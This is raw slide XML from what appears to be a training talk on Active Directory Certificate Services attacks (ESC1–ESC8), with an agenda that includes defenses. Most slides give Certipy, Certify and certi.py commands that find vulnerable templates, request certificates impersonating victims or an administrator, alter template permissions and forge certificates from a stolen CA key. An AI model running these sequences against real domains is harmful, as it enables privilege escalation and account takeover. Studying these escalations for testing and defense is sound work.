                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://github.com/ly4k/Certipy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> (Gold standard now)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>For each escalation I will show the command for each of these tools (where applicable)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Finding Vulnerable Templates</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="219" name="Google Shape;219;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a:t>Certify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> /find /vulnerable (uses local auth) on a Windows Server</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Certipy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> find -u USERNAME@DOMAIN -p PASSWORD -target (DNS or IP)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Certi.py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> list DOMAIN\UserName:Password -dc-ip 192.168.56.12</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="220" name="Google Shape;220;p14"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3144806"/>
            <a:ext cx="9144001" cy="19986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Analysing CAs</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="226" name="Google Shape;226;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27" name="Google Shape;227;p15"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="942750" y="1567552"/>
            <a:ext cx="7469576" cy="3127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Analysing Templates</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="233" name="Google Shape;233;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34" name="Google Shape;234;p16"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="730575" y="1517550"/>
            <a:ext cx="8172750" cy="3625950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="235" name="Google Shape;235;p16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="727850" y="1753775"/>
            <a:ext cx="762600" cy="1872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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="727850" y="2017082"/>
            <a:ext cx="1698300" cy="152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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="727850" y="2169475"/>
            <a:ext cx="3112500" cy="152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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="797075" y="3183800"/>
            <a:ext cx="4914900" cy="816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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="727850" y="2800300"/>
            <a:ext cx="5289000" cy="1872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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="852325" y="4110325"/>
            <a:ext cx="4859700" cy="103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Important Key Usage</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="246" name="Google Shape;246;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400050" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2700"/>
              <a:t>Client Authentication</a:t>
            </a:r>
            <a:endParaRPr sz="2700"/>
          </a:p>
          <a:p>
            <a:pPr indent="-400050" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2700"/>
              <a:t>PKINIT Client Authentication</a:t>
            </a:r>
            <a:endParaRPr sz="2700"/>
          </a:p>
          <a:p>
            <a:pPr indent="-400050" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2700"/>
              <a:t>Smart Card Logon</a:t>
            </a:r>
            <a:endParaRPr sz="2700"/>
          </a:p>
          <a:p>
            <a:pPr indent="-400050" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2700"/>
              <a:t>Any Purpose</a:t>
            </a:r>
            <a:endParaRPr sz="2700"/>
          </a:p>
          <a:p>
            <a:pPr indent="-400050" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2700"/>
              <a:t>NO EKU (SubCA)</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ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3537150" y="1578400"/>
            <a:ext cx="5017500" cy="64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2400"/>
              <a:t>Certificate Template Vulns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ESC1 - Specifiable subjectAltName</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="257" name="Google Shape;257;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58" name="Google Shape;258;p19"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="685068" y="1567552"/>
            <a:ext cx="7773865" cy="2911200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="259" name="Google Shape;259;p19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685075" y="2308350"/>
            <a:ext cx="5831100" cy="221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Agenda</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="141" name="Google Shape;141;p2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1297500" y="1567550"/>
            <a:ext cx="4146900" cy="2911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en"/>
              <a:t>What is a certificate and why is it important?</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n"/>
              <a:t>Ways to extract certificates from a compromised host</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n"/>
              <a:t>Ways to exploit misconfigured certificate templates</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rPr lang="en"/>
              <a:t>Helpful Hints</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rPr lang="en"/>
              <a:t>Defenses</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="142" name="Google Shape;142;p2"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="21574" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5121125" y="1361700"/>
            <a:ext cx="3755200" cy="2686250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="143" name="Google Shape;143;p2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5904850" y="3305200"/>
            <a:ext cx="6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Lato"/>
                <a:ea typeface="Lato"/>
                <a:cs typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
              <a:t>Admin</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt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ESC1 - Exploiting</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="265" name="Google Shape;265;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="579150" y="1567550"/>
            <a:ext cx="7985700" cy="2911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latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>ceritpy req -u USER@DOMAIN -p PASS -ca CA_NAME -target CA_DNS -template TEMPLATE -subject VICTIM</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certipy req -u USER@DOMAIN -p PASS -ca CA_NAME -target CA_DNS -template TEMPLATE -upn USER_VICTIM -dns MACHINE_VICTIM</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python3 certi.py req DOMAIN/USER:PASS@CA CA_NAME -t TEMPLATE -a VICTIM</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1200"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>certify.exe request /ca:IP(OR DNS)\CA_NAME /template:TEMPLATE /altname:VICTIM /sidextension:VICTIMSID</a:t>
            </a:r>
            <a:endParaRPr>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ESC2 - Any Purpose</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="271" name="Google Shape;271;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72" name="Google Shape;272;p21"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1018912" y="1532900"/>
            <a:ext cx="7106175" cy="337954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ESC3.1 - “Gemini” Certificates - CRA</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="278" name="Google Shape;278;p2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79" name="Google Shape;279;p22"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="350800" y="1567550"/>
            <a:ext cx="8442399" cy="3064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ESC3.2 - “Gemini” Certificates - RA</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="285" name="Google Shape;285;p2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86" name="Google Shape;286;p23"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="470443" y="1567550"/>
            <a:ext cx="8203114" cy="3077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ESC3.1 - CRA - Generating</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="292" name="Google Shape;292;p2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latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>ceritpy req -u USER@DOMAIN -p PASS -ca CA_NAME -target CA_DNS -template TEMPLATE (CRA TEMPLATE)</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python3 certi.py req DOMAIN/USER:IP@CA CA_NAME -t TEMPLATE</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1200"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>certify.exe request /ca:IP(OR DNS)\CA_NAME /template:TEMPLATE</a:t>
            </a:r>
            <a:endParaRPr>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ESC3.2 - Required Signature - Exploiting</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="298" name="Google Shape;298;p2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latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>certipy req -u USER@DOMAIN -p PASS -ca ENROLL_SERV -target CA_DNS -template TEMPLATE -on-behalf-of 'DOMAIN\VICTIM' -pfx CERT.pfx</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python3 certi.py req DOMAIN/USER:IP@CA ENROLL_SERV -t TEMPLATE --on-behalf DOMAIN\VICTIM</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1200"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>certify.exe request /ca:IP(OR DNS)\ENROLL_SERV /template:TEMPLATE /onbehalfof:DOMAIN\VICTIM /enrollcert:C:\PATH\TOCERT.pfx</a:t>
            </a:r>
            <a:endParaRPr>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6"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1773374" y="1307850"/>
            <a:ext cx="5597252" cy="3701149"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="304" name="Google Shape;304;p26"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2160888" y="1216848"/>
            <a:ext cx="4822225" cy="3792150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="305" name="Google Shape;305;p2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ESC4 - Template Access Control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xit" presetID="10" presetSubtype="0">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect filter="fade" transition="out">
                                      <p:cBhvr>
                                        <p:cTn dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="303"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="500"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3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ESC4 - Exploiting</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="311" name="Google Shape;311;p2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latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>certipy template -u USER@DOMAIN -p PASS -template ESC4-Test </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>-save-old</a:t>
            </a:r>
            <a:endParaRPr b="1">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certipy req -u USER@DOMAIN -p PASS -ca CA_NAME -target CA_DNS -template TEMPLATE -upn USER_VICTIM -dns MACHINE_VICTIM</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certipy template -u USER@DOMAIN -p PASS -template ESC4-Test </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>-replace</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1200"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>Using: https://github.com/cfalta/PoshADCS</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ESC5 - Access Control Objects</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="317" name="Google Shape;317;p2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18" name="Google Shape;318;p28"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1297502" y="1527725"/>
            <a:ext cx="7038899" cy="33641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1a30ba6456_0_1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ESC5 - Golden Certificate</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="324" name="Google Shape;324;g21a30ba6456_0_11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nsolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>certipy ca -backup -u USER@DOMAIN -p PASS -ca VULNCA</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certipy forge -ca-pfx VULN.pfx -upn TARGET@DOMAIN -subject 'CN=TARGET,CN=Users,DC=DOMAIN,DC=local' (optional -crl and -template)</a:t>
            </a:r>
            <a:endParaRPr>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ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3537150" y="1578400"/>
            <a:ext cx="5017500" cy="64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lang="en" sz="2400"/>
              <a:t>What is a certificate?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ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3537150" y="1578400"/>
            <a:ext cx="5017500" cy="64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2400"/>
              <a:t>Certificate Authority Vulns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ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="335" name="Google Shape;335;p3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36" name="Google Shape;336;p30"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="662050" y="1567550"/>
            <a:ext cx="7819899" cy="3187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ESC7 - Malicious Management</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="342" name="Google Shape;342;p3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43" name="Google Shape;343;p31"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="864075" y="1553238"/>
            <a:ext cx="7905750" cy="3286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ESC7 - Exploitation</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="349" name="Google Shape;349;p3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Font typeface="Consolas"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>certipy ca -ca 'CA_SRV' -add-officer USER -u USER@DOMAIN -p PASS (If only MANAGE CA Perms)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Consolas"/>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>certipy ca -ca 'corp-DC-CA' -enable-template SubCA -u USER@DOMAIN -p PASS</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buFont typeface="Consolas"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>certipy req -u USER@DOMAIN -p PASS -ca 'CA_SRV' -target CA_FULLNAME -template SubCA -upn administrator@DOMAIN (Note REQ ID in output)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buFont typeface="Consolas"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>certipy ca -ca 'CA_SRV' -issue-request REQ_ID -u USER@DOMAIN -p PASS</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buFont typeface="Consolas"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>certipy req -u USER@DOMAIN -p PASS -ca 'CA_SRV' -target CA_FULLNAME -retrieve REQ_ID</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1200"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>Alternate attack: https://www.tarlogic.com/blog/ad-cs-manageca-rce/</a:t>
            </a:r>
            <a:endParaRPr>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ESC8 - Certificate Responder</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
